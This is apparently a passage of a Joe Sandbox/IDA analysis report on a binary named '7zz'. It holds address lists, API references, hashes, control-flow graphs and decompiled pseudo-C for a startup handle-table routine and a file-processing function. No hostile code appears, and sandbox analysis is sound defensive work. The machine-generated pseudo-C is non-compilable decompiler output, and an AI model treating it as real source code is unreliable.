                                                                      0x004269ee
                                                                      0x004269f0
                                                                      0x004269f2
                                                                      0x00426ebd
                                                                      0x00426ec5
                                                                      0x00426ecc
                                                                      0x00426ed6
                                                                      0x00426edc
                                                                      0x00426edf
                                                                      0x00426ee3
                                                                      0x00426ee5
                                                                      0x00426eea
                                                                      0x00426eea
                                                                      0x00426ef3
                                                                      0x00426ef7
                                                                      0x00426f02
                                                                      0x00426f06
                                                                      0x00426f0e
                                                                      0x00426f12
                                                                      0x00426f1b
                                                                      0x00426f20
                                                                      0x00426f27
                                                                      0x00000000
                                                                      0x004269f8
                                                                      0x004269f8
                                                                      0x00426a00
                                                                      0x00426a07
                                                                      0x00426a11
                                                                      0x00426a17
                                                                      0x00000000
                                                                      0x00426a17
                                                                      0x004269f2
                                                                      0x00426973
                                                                      0x00426958
                                                                      0x004268ee
                                                                      0x004268ee
                                                                      0x004268f1
                                                                      0x004268ff
                                                                      0x00426903
                                                                      0x00426905
                                                                      0x00426908
                                                                      0x0042690a
                                                                      0x00426923
                                                                      0x00426923
                                                                      0x00426925
                                                                      0x00426929
                                                                      0x0042692e
                                                                      0x0042692e
                                                                      0x00000000
                                                                      0x0042690c
                                                                      0x00426912
                                                                      0x00426915
                                                                      0x00426917
                                                                      0x0042691a
                                                                      0x00426d99
                                                                      0x00426d9c
                                                                      0x00426da0
                                                                      0x00426da2
                                                                      0x00426da7
                                                                      0x00426da7
                                                                      0x00426db0
                                                                      0x00426db4
                                                                      0x00426dbf
                                                                      0x00426dc3
                                                                      0x00426dcb
                                                                      0x00426dcf
                                                                      0x00426dd8
                                                                      0x00426ddd
                                                                      0x00426de7
                                                                      0x00426dee
                                                                      0x00426df3
                                                                      0x00426dfa
                                                                      0x00426dff
                                                                      0x00426920
                                                                      0x00426920
                                                                      0x00000000
                                                                      0x00426920
                                                                      0x0042691a
                                                                      0x0042690a
                                                                      0x004268ab
                                                                      0x004268ae
                                                                      0x004268b1
                                                                      0x004268b4
                                                                      0x004268b7
                                                                      0x00426ceb
                                                                      0x00426ced
                                                                      0x00426cf1
                                                                      0x00426cf6
                                                                      0x00426cf6
                                                                      0x00426cff
                                                                      0x00426d03
                                                                      0x00426d0e
                                                                      0x00426d12
                                                                      0x00426d1a
                                                                      0x00426d1e
                                                                      0x00426d27
                                                                      0x00426d2c
                                                                      0x00426d33
                                                                      0x00426b8c
                                                                      0x00426b8c
                                                                      0x00000000
                                                                      0x004268bd
                                                                      0x004268ca
                                                                      0x004268cd
                                                                      0x004268cf
                                                                      0x004268d2
                                                                      0x00426d3f
                                                                      0x00426d42
                                                                      0x00426d46
                                                                      0x00426d48
                                                                      0x00426d4d
                                                                      0x00426d4d
                                                                      0x00426d56
                                                                      0x00426d5a
                                                                      0x00426d65
                                                                      0x00426d69
                                                                      0x00426d71
                                                                      0x00426d75
                                                                      0x00426d7e
                                                                      0x00426d83
                                                                      0x00426d8a
                                                                      0x00426d8d
                                                                      0x00426f2e
                                                                      0x00426f31
                                                                      0x00426f36
                                                                      0x00426f3d
                                                                      0x004270f4
                                                                      0x004270f4
                                                                      0x004268d8
                                                                      0x004268d8
                                                                      0x00000000
                                                                      0x004268d8
                                                                      0x004268d2
                                                                      0x004268b7
                                                                      0x00000000
                                                                      0x00426c9e
                                                                      0x00426ca7
                                                                      0x00426cb3
                                                                      0x00426cbc
                                                                      0x00426cc0
                                                                      0x00426ccb
                                                                      0x00426ccf
                                                                      0x00426cd4
                                                                      0x00426cd5
                                                                      0x00426cd8
                                                                      0x00426cd8
                                                                      0x00000000
                                                                      0x00426ce1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00426698
                                                                      0x004270f6
                                                                      0x004270fc
                                                                      0x00427104
                                                                      0x00426562
                                                                      0x00426562
                                                                      0x00426565
                                                                      0x0042656d
                                                                      0x0042656f
                                                                      0x00426577
                                                                      0x00426586
                                                                      0x00426586
                                                                      0x00426579
                                                                      0x00426579
                                                                      0x0042657c
                                                                      0x00426582
                                                                      0x00426582
                                                                      0x0042658a
                                                                      0x0042658d
                                                                      0x00426592
                                                                      0x00426592
                                                                      0x00426598
                                                                      0x0042659a
                                                                      0x004265a0
                                                                      0x004265a6
                                                                      0x004265a9
                                                                      0x004265ab
                                                                      0x004265b3
                                                                      0x004265b7
                                                                      0x004265be
                                                                      0x004265be
                                                                      0x0042655c

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 004264FC
                                                                        • Part of subcall function 0042CD7D: __EH_prolog.LIBCMT ref: 0042CD82
                                                                        • Part of subcall function 00467C60: InitializeCriticalSection.KERNEL32(?,00000001,?,?,-00000016), ref: 00467C8E
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 00426737
                                                                      • SysFreeString.OLEAUT32(?), ref: 00426A11
                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,?,00000000), ref: 00426B05
                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,?,00000000), ref: 00426B70
                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,?,00000000), ref: 00426BCC
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 00426D1E
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 00426D75
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 00426DCF
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 00426E3A
                                                                      • SysFreeString.OLEAUT32(?), ref: 00426E63
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 00426E9F
                                                                      • SysFreeString.OLEAUT32(?), ref: 00426ED6
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 00426F12
                                                                      • DeleteCriticalSection.KERNEL32(?,?,?,00000004,00000004), ref: 00426F8A
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 0042701A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$Delete$FreeString$H_prolog$Initialize
                                                                      • String ID: *$c[@
                                                                      • API String ID: 3004459923-117524647
                                                                      • Opcode ID: bcf1dbc30945ca63f9fdfa5c062172442a0eb17af4700839d2541935a3d072c6
                                                                      • Instruction ID: 54e86bbab3a080c51c4da8baaff600dccbbf03e7154ae3ec1f80e40b651aacad
                                                                      • Opcode Fuzzy Hash: bcf1dbc30945ca63f9fdfa5c062172442a0eb17af4700839d2541935a3d072c6
                                                                      • Instruction Fuzzy Hash: A1927D70900259EFCF10DFA4D584ADDBBB0BF14308F6584AEE449A7391CB789A89CF55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046FCD7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 150COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1171 46fcd7-46fcef call 46bfc5 1174 46fcf1-46fcf8 call 46d03c 1171->1174 1175 46fcf9-46fd09 1171->1175 1174->1175 1177 46fd0f-46fd11 1175->1177 1179 46fd13-46fd2f 1177->1179 1180 46fd31-46fd40 GetStartupInfoA 1177->1180 1179->1177 1181 46fd46-46fd4b 1180->1181 1182 46fe17 1180->1182 1181->1182 1184 46fd51-46fd63 1181->1184 1183 46fe19-46fe29 1182->1183 1185 46fe2b-46fe31 1183->1185 1186 46fe78 1183->1186 1187 46fd67-46fd6d 1184->1187 1188 46fd65 1184->1188 1191 46fe33-46fe36 1185->1191 1192 46fe38-46fe3f 1185->1192 1193 46fe7c-46fe80 1186->1193 1189 46fdc5-46fdc9 1187->1189 1190 46fd6f 1187->1190 1188->1187 1189->1182 1196 46fdcb-46fdd3 1189->1196 1194 46fd74-46fd81 call 46bfc5 1190->1194 1195 46fe42-46fe4e GetStdHandle 1191->1195 1192->1195 1193->1183 1197 46fe82-46fe92 SetHandleCount 1193->1197 1206 46fd83-46fd8c 1194->1206 1207 46fdbf 1194->1207 1199 46fe67-46fe6b 1195->1199 1200 46fe50-46fe59 GetFileType 1195->1200 1201 46fdd5-46fdd9 1196->1201 1202 46fe0d-46fe15 1196->1202 1199->1193 1200->1199 1204 46fe5b-46fe65 1200->1204 1201->1202 1205 46fddb-46fddd 1201->1205 1202->1182 1202->1196 1204->1199 1208 46fe6d-46fe70 1204->1208 1209 46fddf-46fde8 GetFileType 1205->1209 1210 46fdea-46fe0a 1205->1210 1211 46fd92-46fd94 1206->1211 1207->1189 1208->1193 1212 46fe72-46fe76 1208->1212 1209->1202 1209->1210 1210->1202 1213 46fd96-46fdb0 1211->1213 1214 46fdb2-46fdbb 1211->1214 1212->1193 1213->1211 1214->1194 1215 46fdbd 1214->1215 1215->1189
                                                                      C-Code - Quality: 99%
                                                                      			E0046FCD7() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = L0046BFC5(0x480);
				if(_t89 == 0) {
					E0046D03C(0x1b);
				}
				 *0x496460 = _t89;
				 *0x496560 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x496460; // 0x2290630
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x496460; // 0x2290630
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87); // executed
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x496560);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x496560 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x496460[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x496464;
					while(1) {
						_t69 = L0046BFC5(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x496560 =  *0x496560 + 0x20;
						__eflags =  *0x496560;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x496560 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x496560; // 0x20
					goto L18;
				}
			}




























                                                                      0x0046fcea
                                                                      0x0046fcef
                                                                      0x0046fcf3
                                                                      0x0046fcf8
                                                                      0x0046fcf9
                                                                      0x0046fcff
                                                                      0x0046fd09
                                                                      0x0046fd09
                                                                      0x0046fd0f
                                                                      0x0046fd13
                                                                      0x0046fd17
                                                                      0x0046fd1a
                                                                      0x0046fd1e
                                                                      0x0046fd22
                                                                      0x0046fd27
                                                                      0x0046fd2a
                                                                      0x0046fd2a
                                                                      0x0046fd35
                                                                      0x0046fd3b
                                                                      0x0046fd40
                                                                      0x0046fe17
                                                                      0x0046fe17
                                                                      0x0046fe17
                                                                      0x0046fe19
                                                                      0x0046fe19
                                                                      0x0046fe1f
                                                                      0x0046fe22
                                                                      0x0046fe26
                                                                      0x0046fe29
                                                                      0x0046fe78
                                                                      0x0046fe78
                                                                      0x0046fe78
                                                                      0x00000000
                                                                      0x0046fe78
                                                                      0x0046fe2b
                                                                      0x0046fe2d
                                                                      0x0046fe31
                                                                      0x0046fe3d
                                                                      0x0046fe3f
                                                                      0x0046fe3f
                                                                      0x0046fe33
                                                                      0x0046fe35
                                                                      0x0046fe35
                                                                      0x0046fe49
                                                                      0x0046fe4b
                                                                      0x0046fe4e
                                                                      0x0046fe67
                                                                      0x0046fe67
                                                                      0x0046fe50
                                                                      0x0046fe51
                                                                      0x0046fe57
                                                                      0x0046fe59
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046fe5b
                                                                      0x0046fe60
                                                                      0x0046fe62
                                                                      0x0046fe65
                                                                      0x0046fe6d
                                                                      0x0046fe70
                                                                      0x0046fe72
                                                                      0x0046fe72
                                                                      0x00000000
                                                                      0x0046fe70
                                                                      0x00000000
                                                                      0x0046fe65
                                                                      0x0046fe7c
                                                                      0x0046fe7c
                                                                      0x0046fe7d
                                                                      0x0046fe7d
                                                                      0x0046fe92
                                                                      0x0046fe92
                                                                      0x0046fd46
                                                                      0x0046fd49
                                                                      0x0046fd4b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046fd51
                                                                      0x0046fd53
                                                                      0x0046fd59
                                                                      0x0046fd61
                                                                      0x0046fd63
                                                                      0x0046fd65
                                                                      0x0046fd65
                                                                      0x0046fd67
                                                                      0x0046fd6d
                                                                      0x0046fdc5
                                                                      0x0046fdc5
                                                                      0x0046fdc7
                                                                      0x0046fdc9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046fdcb
                                                                      0x0046fdcb
                                                                      0x0046fdce
                                                                      0x0046fdd0
                                                                      0x0046fdd3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046fdd5
                                                                      0x0046fdd7
                                                                      0x0046fdd9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046fddb
                                                                      0x0046fddd
                                                                      0x0046fdea
                                                                      0x0046fdf1
                                                                      0x0046fdf1
                                                                      0x0046fdfe
                                                                      0x0046fe06
                                                                      0x0046fe0a
                                                                      0x00000000
                                                                      0x0046fe0a
                                                                      0x0046fde0
                                                                      0x0046fde6
                                                                      0x0046fde8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046fe0d
                                                                      0x0046fe0d
                                                                      0x0046fe11
                                                                      0x0046fe12
                                                                      0x0046fe13
                                                                      0x0046fe13
                                                                      0x00000000
                                                                      0x0046fd6f
                                                                      0x0046fd6f
                                                                      0x0046fd74
                                                                      0x0046fd79
                                                                      0x0046fd7e
                                                                      0x0046fd81
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046fd83
                                                                      0x0046fd83
                                                                      0x0046fd8a
                                                                      0x0046fd8c
                                                                      0x0046fd8c
                                                                      0x0046fd92
                                                                      0x0046fd92
                                                                      0x0046fd94
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046fd96
                                                                      0x0046fd9a
                                                                      0x0046fd9d
                                                                      0x0046fda1
                                                                      0x0046fda7
                                                                      0x0046fdaa
                                                                      0x0046fdaa
                                                                      0x0046fdb2
                                                                      0x0046fdb5
                                                                      0x0046fdbb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046fdbd
                                                                      0x0046fdbf
                                                                      0x00000000
                                                                      0x0046fdbf

                                                                      APIs
                                                                      • GetStartupInfoA.KERNEL32(?), ref: 0046FD35
                                                                      • GetFileType.KERNEL32(00000480), ref: 0046FDE0
                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 0046FE43
                                                                      • GetFileType.KERNELBASE(00000000), ref: 0046FE51
                                                                      • SetHandleCount.KERNEL32 ref: 0046FE88
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: FileHandleType$CountInfoStartup
                                                                      • String ID: ddI
                                                                      • API String ID: 1710529072-3188649337
                                                                      • Opcode ID: 1896333707a73830e72ce406a203d9127db2bfa533a9f37e38ad935da20a16a3
                                                                      • Instruction ID: c6205cd4f5c3ada4982f3df846bf7a0052440ebcd376ac522a15a622ffbc9688
                                                                      • Opcode Fuzzy Hash: 1896333707a73830e72ce406a203d9127db2bfa533a9f37e38ad935da20a16a3
                                                                      • Instruction Fuzzy Hash: B95118715002058BC720CF68E9447667BA0EB21768F25467FC5D2CB2E2FB39984ACB4B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00415420 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1216 415420-41543f call 46b890 1219 415441-415448 call 408c73 1216->1219 1220 41544e-415453 1216->1220 1219->1220 1228 41544a 1219->1228 1222 415482 1220->1222 1223 415455-41547b 1220->1223 1225 415485-41548d 1222->1225 1223->1225 1232 41547d 1223->1232 1226 415493-415497 1225->1226 1227 4158a9-415903 call 411bd0 call 4039c0 call 407a18 call 40351a call 40b5c9 1225->1227 1226->1227 1230 41549d-4154a0 1226->1230 1271 415909 1227->1271 1272 415b38-415b4d GetLastError call 415c6d call 406796 1227->1272 1228->1220 1233 4154a2-4154ac 1230->1233 1234 4154ce-4154d1 1230->1234 1236 415bb9-415bc7 1232->1236 1233->1234 1237 4154ae-4154b2 1233->1237 1234->1227 1238 4154d7-4154fa call 404ad0 1234->1238 1237->1234 1240 4154b4-4154bd 1237->1240 1247 415500-415539 call 40b0a0 call 40351a call 40b431 1238->1247 1248 415723-41572b 1238->1248 1240->1234 1243 4154bf-4154c6 call 408a3b 1240->1243 1243->1234 1257 4154c8-4154cc 1243->1257 1274 41553e-415540 1247->1274 1250 415731-415734 1248->1250 1251 415870-41587c call 408604 1248->1251 1255 415743-41577b call 40b0a0 call 40351a call 40b431 1250->1255 1256 415736-41573d 1250->1256 1269 415b73-415b75 1251->1269 1298 4157c6-4157d1 1255->1298 1299 41577d-415786 call 408c9e 1255->1299 1256->1255 1263 415860-41586a 1256->1263 1257->1233 1257->1234 1263->1250 1263->1251 1269->1236 1275 41590e-415912 1271->1275 1280 415b52-415b6e call 407a18 * 2 call 40b154 1272->1280 1278 415542-415576 GetLastError call 415c6d call 406796 call 407a18 * 2 1274->1278 1279 41557b-415587 1274->1279 1275->1280 1281 415918-41591c 1275->1281 1358 415714-41571d 1278->1358 1290 4155e0-4155e4 1279->1290 1291 415589-41558d 1279->1291 1280->1269 1285 415953-4159a7 call 4092a8 call 406796 call 4092a8 call 408e8a 1281->1285 1286 41591e-415922 1281->1286 1361 4159a9-4159c8 call 40862d call 408604 1285->1361 1362 4159cd-415a02 call 40862d call 408604 call 408e8a 1285->1362 1286->1285 1293 415924-41594a 1286->1293 1295 4155e6-4155ff call 415c6d call 406796 1290->1295 1296 41558f-4155c6 call 405b9f call 406796 call 408e8a 1290->1296 1291->1295 1291->1296 1319 415950 1293->1319 1320 415b77-415b79 1293->1320 1343 4156f8-415713 call 407a18 * 2 1295->1343 1354 415604-415637 call 40862d call 408604 call 4150e0 1296->1354 1355 4155c8-4155db call 40862d 1296->1355 1302 4157d3 1298->1302 1303 4157ee-415845 call 405b9f call 415bca call 40862d call 408604 1298->1303 1325 415847-41585f call 407a18 * 2 1299->1325 1326 41578c-415793 GetLastError 1299->1326 1311 4157d8-4157ec call 415c6d call 406796 1302->1311 1303->1325 1376 415881-41588c call 407a18 1303->1376 1311->1325 1319->1285 1334 415b96-415bb7 call 407a18 * 2 call 40b154 1320->1334 1325->1263 1326->1311 1334->1236 1343->1358 1354->1343 1394 41563d-415661 call 405b9f call 408b37 1354->1394 1377 4156f3 call 408604 1355->1377 1358->1247 1358->1248 1391 415ae7-415b32 call 40862d call 408604 call 407a18 call 40351a call 40b5c9 1361->1391 1400 415a04-415a25 call 4150e0 1362->1400 1401 415a2b-415a36 1362->1401 1389 41588f-4158a4 call 407a18 call 408604 1376->1389 1377->1343 1389->1236 1391->1272 1391->1275 1421 415663-415666 1394->1421 1422 41568d-415699 call 406796 1394->1422 1400->1401 1414 415a27 1400->1414 1403 415a44-415a4f 1401->1403 1404 415a38-415a3f 1401->1404 1409 415a51-415a61 call 408b37 1403->1409 1410 415a6c-415a70 1403->1410 1404->1391 1409->1410 1427 415a63-415a69 1409->1427 1417 415a81-415a98 call 40862d call 409500 1410->1417 1418 415a72-415a76 1410->1418 1414->1401 1440 415a9a-415aa7 call 406796 1417->1440 1441 415aac-415add call 415bca 1417->1441 1418->1417 1423 415a78-415a7f 1418->1423 1428 415668-41566d 1421->1428 1429 41567b-41568b 1421->1429 1434 41569e-4156d4 call 415bca 1422->1434 1423->1391 1427->1410 1435 41566e-415679 call 43ac2f 1428->1435 1429->1434 1447 415795-4157c1 call 40862d call 408604 call 407a18 1434->1447 1448 4156da-4156ed call 40862d 1434->1448 1435->1429 1440->1441 1453 415ae3 1441->1453 1454 415b7b-415b93 call 40862d call 408604 1441->1454 1447->1389 1448->1377 1453->1391 1454->1334
                                                                      C-Code - Quality: 81%
                                                                      			E00415420(signed int __ecx, intOrPtr __edx) {
				intOrPtr _t314;
				void* _t315;
				signed int _t321;
				signed int _t328;
				signed int _t340;
				signed char _t350;
				intOrPtr _t351;
				signed int _t356;
				signed int _t368;
				signed int _t373;
				signed int _t377;
				signed char _t383;
				signed int _t388;
				signed int _t393;
				signed char _t395;
				signed int _t411;
				intOrPtr _t415;
				signed int _t418;
				signed int _t421;
				signed int _t424;
				intOrPtr _t460;
				signed int _t462;
				signed int _t469;
				signed int _t473;
				signed int _t476;
				intOrPtr _t532;
				void* _t555;
				intOrPtr _t564;
				signed int _t568;
				signed int _t573;
				signed int _t579;
				intOrPtr _t581;
				signed int _t585;
				intOrPtr _t586;
				signed int _t587;
				signed int _t588;
				signed int _t590;
				signed int _t593;
				void* _t596;

				E0046B890(E0047490E, _t596);
				_t469 = __ecx;
				 *((intOrPtr*)(_t596 - 0x3c)) = __edx;
				 *(_t596 - 0x10) = __ecx;
				if( *(_t596 + 0x18) == 0 && E00408C73(__ecx) != 0) {
					 *(_t596 + 0x18) = 1;
				}
				_t568 =  *(_t596 + 0x1c);
				if(_t568 == 0) {
					_t581 =  *((intOrPtr*)(_t596 + 0x14));
					L7:
					_t314 =  *((intOrPtr*)(_t596 + 0x10));
					_t590 = 0;
					__eflags =  *(_t314 + 8);
					if( *(_t314 + 8) != 0) {
						L53:
						_push(0x2a);
						_t315 = E00411BD0(_t596 - 0x20,  *((intOrPtr*)(_t596 + 0xc)));
						 *(_t596 - 0x78) =  *(_t596 - 0x78) | 0xffffffff;
						 *(_t596 - 4) = 0xd;
						 *(_t596 - 4) = 0xe;
						E004039C0(_t596 - 0x74, _t315);
						 *(_t596 - 4) = 0x10;
						E00407A18( *((intOrPtr*)(_t596 - 0x20)));
						 *(_t596 - 0x38) =  *(_t596 - 0x38) & 0x00000000;
						E0040351A(_t596 - 0xd4);
						_push(_t596 - 0x11);
						 *(_t596 - 4) = 0x11;
						_t321 = E0040B5C9(_t596 - 0xfc);
						__eflags = _t321;
						if(_t321 == 0) {
							L78:
							E00415C6D( *((intOrPtr*)(_t596 + 0x24)), GetLastError());
							_push( *((intOrPtr*)(_t596 + 0xc)));
							E00406796( *((intOrPtr*)(_t596 + 0x20)));
							L79:
							E00407A18( *((intOrPtr*)(_t596 - 0xd4)));
							_t297 = _t596 - 4;
							 *_t297 =  *(_t596 - 4) | 0xffffffff;
							__eflags =  *_t297;
							E00407A18( *((intOrPtr*)(_t596 - 0x74)));
							E0040B154(_t596 - 0x78);
							L80:
							_t328 = 0;
							L84:
							 *[fs:0x0] =  *((intOrPtr*)(_t596 - 0xc));
							return _t328;
						}
						while(1) {
							__eflags =  *((char*)(_t596 - 0x11));
							if( *((char*)(_t596 - 0x11)) == 0) {
								goto L79;
							}
							__eflags =  *(_t596 + 0x1c);
							if( *(_t596 + 0x1c) == 0) {
								L60:
								_push( *((intOrPtr*)(_t596 + 0x10)));
								 *((char*)(_t596 - 0x40)) =  *(_t596 + 0x18);
								E004092A8(_t596 - 0x34);
								_push(_t596 - 0xd4);
								 *(_t596 - 4) = 0x12;
								E00406796(_t596 - 0x34);
								_push(_t596 - 0x34);
								E004092A8(_t596 - 0x54);
								 *(_t596 - 4) = 0x13;
								_t340 = E00408E8A(_t469, 0, _t596 - 0x54,  !( *(_t596 - 0xdc) >> 4) & 0x00000001);
								__eflags = _t340;
								 *((intOrPtr*)(_t596 - 0x54)) = 0x47a420;
								if(_t340 == 0) {
									 *(_t596 - 4) = 0x16;
									E0040862D();
									 *(_t596 - 4) = 0x12;
									E00408604(_t596 - 0x54);
									__eflags = E00408E8A(_t469, 1, _t596 - 0x34,  !( *(_t596 - 0xdc) >> 4) & 0x00000001);
									if(__eflags != 0) {
										_push(_t581 + 0x3c);
										_push(_t596 - 0xfc);
										E004150E0( *((intOrPtr*)(_t596 - 0x3c)),  *((intOrPtr*)(_t596 + 8)), __eflags);
										_t383 =  *(_t596 - 0xdc) >> 4;
										__eflags = _t383 & 0x00000001;
										if((_t383 & 0x00000001) != 0) {
											 *((char*)(_t596 - 0x40)) = 1;
										}
									}
									_t350 =  *(_t596 - 0xdc) >> 4;
									__eflags = _t350 & 0x00000001;
